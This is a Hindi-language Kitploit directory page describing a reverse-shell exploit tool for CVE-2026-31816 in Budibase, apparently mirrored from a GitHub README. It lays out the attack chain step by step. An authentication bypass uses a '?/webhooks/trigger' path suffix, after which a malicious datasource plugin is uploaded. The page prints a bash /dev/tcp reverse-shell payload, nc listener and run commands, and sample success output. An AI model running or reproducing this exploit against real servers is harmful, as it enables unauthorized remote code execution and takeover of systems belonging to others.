Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31816-rshell — CVE-2026-31816 में Budibase का शोषण करके प्रमाणीकरण को बायपास करता है, एक दुर्भावनापूर्ण डेटासोर्स प्लगइन अपलोड करता है, और रिमोट एक्सेस के लिए रिवर्स शेल निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/imjdl/cve-2026-31816-rshell
शोषणवेब एप्लिकेशन शोषणप्रमाणीकरणरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

CVE-2026-31816 में Budibase का शोषण करके प्रमाणीकरण को बायपास करता है, एक दुर्भावनापूर्ण डेटासोर्स प्लगइन अपलोड करता है, और रिमोट एक्सेस के लिए रिवर्स शेल निष्पादित करता है।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31816 रिवर्स शेल एक्सप्लॉइट

अवलोकन

यह टूल CVE-2026-31816 का उपयोग करके लक्षित Budibase सर्वर पर रिवर्स शेल कनेक्शन स्थापित करता है।

अटैक चेन: प्रमाणीकरण बायपास → DATASOURCE प्लगइन अपलोड → सर्वर-साइड कोड निष्पादन → रिवर्स शेल

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)
  • CVE-2026-31816 के प्रति संवेदनशील लक्षित Budibase सर्वर

उपयोग

मूल चरण

root@kitploit:~
# 1. अटैकर मशीन पर लिसनर शुरू करें
nc -lvnp 4444

# 2. एक्सप्लॉइट चलाएँ (दूसरा टर्मिनल)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

पैरामीटर

पैरामीटरआवश्यकविवरण
-t, --target✅लक्षित Budibase URL
--lhost✅लिसनर होस्ट (आपका IP)
--lport❌लिसनर पोर्ट (डिफ़ॉल्ट: 4444)

उदाहरण

root@kitploit:~
# अटैकर IP: 192.168.1.100
# लक्षित Budibase: 192.168.1.128:10000

# टर्मिनल 1 - लिसनर शुरू करें
nc -lvnp 4444

# टर्मिनल 2 - एक्सप्लॉइट चलाएँ
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

यह कैसे काम करता है

1. संवेदनशीलता जाँच

root@kitploit:~
GET /api/integrations?/webhooks/trigger

यदि 200 लौटता है, तो लक्ष्य प्रमाणीकरण बायपास के प्रति संवेदनशील है।

2. दुर्भावनापूर्ण प्लगइन बनाएँ

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

DATASOURCE प्रकार के प्लगइन सर्वर पर JavaScript कोड निष्पादित करते हैं।

3. रिवर्स शेल पेलोड

root@kitploit:~
// प्लगइन सत्यापित होने पर निष्पादित:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. अपलोड और निष्पादन

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

प्रमाणीकरण को बायपास करके प्लगइन अपलोड करें। सत्यापन के दौरान कोड निष्पादित होता है।

अटैक प्रवाह

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attacker   │     │   Target    │     │  Listener   │
│             │     │   Server    │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Upload      │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Execute     │────►│ Listen      │
│             │     │ Code        │◄────┤ Reverse     │
│             │     │             │     │ Connect     │
└─────────────┘     └─────────────┘     └─────────────┘

सफलता संकेतक

root@kitploit:~
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444

[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444

[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!

============================================================
[+] SUCCESS! Check your listener!
============================================================

समस्या निवारण

प्रश्न: कनेक्शन विफल, कोई शेल प्राप्त नहीं हुआ

संभावित कारण:

  1. फ़ायरवॉल रिवर्स कनेक्शन को ब्लॉक कर रहा है
  2. लक्षित सर्वर अटैकर IP तक नहीं पहुँच सकता
  3. लक्षित सर्वर में bash की कमी है

समाधान:

root@kitploit:~
# नेटवर्क कनेक्टिविटी जाँचें
ping YOUR_IP

# फ़ायरवॉल जाँचें
sudo ufw allow 4444/tcp

# अलग पोर्ट आज़माएँ
nc -lvnp 8080

प्रश्न: अपलोड विफल

संभावित कारण:

  1. लक्ष्य ने संवेदनशीलता को पैच कर दिया है
  2. नेटवर्क समस्याएँ

समाधान:

root@kitploit:~
# मैन्युअल रूप से जाँचें कि संवेदनशीलता मौजूद है या नहीं
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# यदि JSON लौटता है, तो संवेदनशीलता मौजूद है
टूल डाउनलोड करें